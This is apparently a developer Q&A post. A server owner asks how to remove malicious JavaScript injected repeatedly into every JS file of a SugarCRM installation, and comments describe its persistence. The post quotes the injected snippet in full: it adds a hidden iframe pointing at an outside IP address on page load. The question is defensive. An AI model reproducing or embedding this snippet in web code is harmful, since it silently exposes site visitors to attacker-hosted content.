# Remove a block of Code from all JS files

Tags: jquery, linux

I want remove this block from all JS files from my debian server. Its a malicious code. I am not sure if I can use SED. Can someone help ?

```
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}
```

Comment: Why is it malicious? What does it do? it is easier if you include a Minimal, Complete and Verifiable example.

Comment: This code is repreated atleast 60 time on each JS file on my SugarCRM CE installation. The original source file doesn't have it. If I replace the file it somehow comes back.